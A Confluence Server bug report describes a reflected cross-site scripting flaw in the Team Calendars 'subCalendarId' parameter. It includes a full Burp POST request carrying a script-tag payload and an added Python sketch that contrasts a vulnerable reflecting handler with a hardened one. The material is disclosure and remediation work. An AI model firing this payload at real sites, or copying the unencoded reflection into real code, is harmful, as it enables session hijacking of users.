Cross-Site Scripting in subscribetocalendar.action


    • Severity 3 - Minor

      NOTE: This bug report is for Confluence Server. Using Confluence Cloud? See the corresponding bug report.

      The contents of the 'subCalendarId' parameter are not validated in POST requests to 'subscribetocalendar.action', so the parameter is susceptible to cross-site scripting.

      Steps to Reproduce:

      1. Start a proxy tool such as Burp Suite.
      2. Log into a Confluence instance with Team Calendars installed.
      3. Use the proxy tool to generate a POST request to '/confluence/calendar/subscribetocalendar.action' with the following payload:

        POST /confluence/calendar/subscribetocalendar.action HTTP/1.1
        Host: rgallagher:1990
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Referer: http://rgallagher:1990/confluence/calendar/subscribetocalendar.action
        Cookie: confluence-sidebar.width=285; JSESSIONID=E85F825667B40A9201910EE6FF9DF7EA; AJS.conglomerate.cookie=""
        Connection: keep-alive
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 75

        subCalendarId=<script>alert('XSS in subscribetocalendar.action')<%2fscript>

      4. Ensure that a valid value is sent in the 'JSESSIONID' cookie.
      5. Send the request from Burp Repeater, and view the output in the browser.
      6. The payload sent in the POST body is reflected in the HTTP response, and its JavaScript executes.

      We've demonstrated the exploitability using Burp Suite because the customer who reported the vulnerability was unable to include steps to reproduce from the UI. An attacker could exploit this instance of cross-site scripting by inducing a user to click on a link which submits the malicious POST request to the victim's Confluence domain.
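The following is an added illustration, not code from this report or from Confluence: a minimal handler that reflects 'subCalendarId' the way the defect does, beside a hardened version that allowlists the id format and HTML-encodes anything it echoes. It assumes, for the allowlist, that a subscribed calendar id is a UUID (an assumption, not something the report states); the request body is the one from the steps above.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed from the report: the raw POST body that Burp Repeater sent.
REPORTED_BODY = "subCalendarId=<script>alert('XSS in subscribetocalendar.action')<%2fscript>"

# Assumption (not from the report): a sub-calendar id is a UUID, so anything
# else is rejected before it can reach a template.
SUB_CALENDAR_ID_RE = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$", re.IGNORECASE
)


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into single-valued fields."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_vulnerable(form: dict) -> str:
    """Mirrors the reported defect: the parameter is reflected unvalidated and unencoded."""
    sub_id = form.get("subCalendarId", "")
    return f"<p>Subscribed to calendar {sub_id}</p>"


def render_hardened(form: dict) -> tuple:
    """Return (status, body): reject ids outside the allowlist, encode what is echoed."""
    sub_id = form.get("subCalendarId", "")
    if not SUB_CALENDAR_ID_RE.match(sub_id):
        # Validation failed: answer 400 and do not echo the rejected value at all.
        return 400, "<p>Invalid calendar id.</p>"
    # Even an allowlisted value is encoded before being placed in HTML text.
    return 200, f"<p>Subscribed to calendar {html.escape(sub_id, quote=True)}</p>"


def contains_script_tag(body: str) -> bool:
    """Crude check used to compare the two handlers: is a raw <script tag present?"""
    return "<script" in body.lower()


if __name__ == "__main__":
    form = parse_form(REPORTED_BODY)
    print("vulnerable:", render_vulnerable(form))
    print("hardened:  ", render_hardened(form))
```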

            Assignee: Toan Vo (Inactive)
            Reporter: NickM
            Votes: 0
            Watchers: 4
